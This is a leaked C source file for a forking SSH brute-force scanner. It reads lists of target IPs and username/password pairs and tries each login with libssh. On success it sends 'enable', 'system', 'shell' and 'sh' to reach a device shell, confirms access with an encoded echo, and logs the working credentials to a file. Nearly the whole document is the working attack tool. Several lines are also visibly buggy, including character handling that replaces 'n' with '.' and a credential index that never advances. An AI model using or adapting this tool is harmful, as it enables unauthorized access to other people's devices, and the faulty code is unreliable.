Untitled

// gcc ssh.c -o ssh -lssh
// it's @kxngaroo found this on a server thought I'd leak lol.

#include <stdio.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <libssh/libssh.h>
#include <stdlib.h>

void trim_data(char *buf);

int verify_login(ssh_session session)
{
    ssh_channel chan;
    char read_buf[512], read_buf2[512];

    chan = ssh_channel_new(session);
    if(!chan)
        return SSH_ERROR;

    int ret = ssh_channel_open_session(chan);
    if(ret != SSH_OK)
    {
        ssh_channel_free(chan);
        return SSH_ERROR;
    }

    ret = ssh_channel_request_exec(chan, "echo -en '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'");
    if(ret != SSH_OK)
    {
        ssh_channel_close(chan);
        ssh_channel_free(chan);
        return SSH_ERROR;
    }

    int i = 0;
    int num_bytes = ssh_channel_read(chan, read_buf, sizeof(read_buf), 0);

    while(num_bytes > 0)
    {
        i = snprintf(read_buf2, sizeof(read_buf2), "%s", read_buf);
        if(i != num_bytes)
        {
            ssh_channel_close(chan);
            ssh_channel_free(chan);
            return SSH_ERROR;
        }
        num_bytes = ssh_channel_read(chan, read_buf, sizeof(read_buf), 0);
    }

    if(!strcasestr(read_buf2, "binfagt"))
    {
        ssh_channel_close(chan);
        ssh_channel_free(chan);
        ssh_channel_send_eof(chan);
        return SSH_ERROR;
    }

    ssh_channel_send_eof(chan);
    ssh_channel_close(chan);
    ssh_channel_free(chan);

    return SSH_OK;
}

int send_command(ssh_session session, char *command)
{
    ssh_channel chan;
    char read_buf[512];

    chan = ssh_channel_new(session);
    if(!chan)
        return SSH_ERROR;

    int ret = ssh_channel_open_session(chan);
    if(ret != SSH_OK)
    {
        ssh_channel_free(chan);
        return SSH_ERROR;
    }

    ret = ssh_channel_request_exec(chan, command);
    if(ret != SSH_OK)
    {
        ssh_channel_close(chan);
        ssh_channel_free(chan);
        return SSH_ERROR;
    }

    ssh_channel_send_eof(chan);
    ssh_channel_close(chan);
    ssh_channel_free(chan);

    return SSH_OK;
}

void check_auth(char *user, char *password, char *host, char *output_name)
{
    FILE *out;

    ssh_session session = ssh_new();
    if(!session)
        return;

    ssh_options_set(session, SSH_OPTIONS_HOST, host);

    int ret = ssh_connect(session);
    if(ret == -1)
    {
        ssh_free(session);
        return;
    }

    ret = ssh_userauth_password(session, user, password);
    if(ret != SSH_AUTH_SUCCESS)
    {
        //printf("[brute] Failed SSH attempt - %s:%s:%s\n", host, user, password);
        ssh_disconnect(session);
        ssh_free(session);
        return;
    }

    if(send_command(session, "enable") != SSH_OK)
        return;
    if(send_command(session, "system") != SSH_OK)
        return;
    if(send_command(session, "shell") != SSH_OK)
        return;
    if(send_command(session, "sh") != SSH_OK)
        return;
    /*if(send_command(session, "cat | sh") != SSH_OK)
        return;
    if(send_command(session, "ping;sh") != SSH_OK)
        return;
    if(send_command(session, "cat;sh") != SSH_OK)
        return;*/

    if(verify_login(session) != SSH_ERROR)
    {
        printf("[brute] Successful SSH attempt - %s:%s:%s\n", host, user, password);

        out = fopen(output_name, "a+");
        if(out != NULL)
            fprintf(out, "%s:%s:%s\n", host, user, password);
    }

    fclose(out);

    return;
}

void trim_data(char *buf)
{
    int i = 0;
    int len = strlen(buf);

    for(i = 0; i < len; i++)
        if(buf[i] == '\n' || buf[i] == '\r')
            buf[i] = 0;
}

int main(int argc, char **argv)
{
    FILE *passf;
    FILE *fp;
    char read_buf[512], read_buf2[512], *a[80196], *temp, *t, *string, *c;
    int max_forks = 0;
    int count = 0;
    int i = 0;
    int num_forks = 0;

    if(argc < 5)
    {
        printf("usage: %s [num forks] [ip list] [login list (format user pass)] [output file]\n", argv[0]);
        return 1;
    }

    if((passf = fopen(argv[3], "r")) == NULL)
        return 1;

    while(fgets(read_buf, sizeof(read_buf), passf))
    {
        trim_data(read_buf);

        while(t = strchr(read_buf, 'n'))
            *t = '.';

        temp = strtok(read_buf, " ");
        string = strdup(temp);
        a[count++] = string;

        while(temp = strtok(NULL, " "))
        {
            string = strdup(temp);
            a[count++] = string;
        }
    }

    fclose(passf);

    if((fp = fopen(argv[2], "r")) == NULL)
        return 1;

    max_forks = atoi(argv[1]);

    while(fgets(read_buf2, sizeof(read_buf2), fp))
    {
        trim_data(read_buf2);

        c = strchr(read_buf2, 'n');

        if(c != NULL)
            *c = '.';

        if(!(fork()))
        {
            check_auth(a[i], a[i+1], read_buf2, argv[4]);
            exit(0);
        }
        else
        {
            num_forks ++;
            if(num_forks++ > max_forks)
                for(num_forks; num_forks > max_forks; num_forks--)
                    wait(NULL);
        }
    }
}